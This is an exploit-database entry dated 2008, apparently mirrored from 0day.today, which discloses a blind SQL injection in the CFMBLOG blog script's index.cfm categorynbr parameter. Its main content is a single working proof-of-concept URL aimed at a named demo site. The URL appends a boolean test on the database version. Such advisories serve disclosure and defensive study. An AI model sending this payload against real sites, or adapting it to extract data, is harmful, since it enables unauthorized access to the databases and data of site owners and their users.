id: 4410
date: 12/10/2008
title: CFMBLOG (index.cfm categorynbr) Blind SQL Injection Vulnerability
author: AlpHaNiX
cves: 

=================================================================
CFMBLOG (index.cfm categorynbr) Blind SQL Injection Vulnerability
=================================================================


###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX

###########################################################################

#script   : CFMBLOG
#download : null
#Demo     : http://www.cfmblog.com


###########################################################################

#Exploits :

--=[BLIND SQL INJECTION]=--

http://www.cfmblog.com/index.cfm?categorynbr=2+and%20substring(@@version,1,1)=5


###########################################################################



#  0day.today [2023-03-26]  #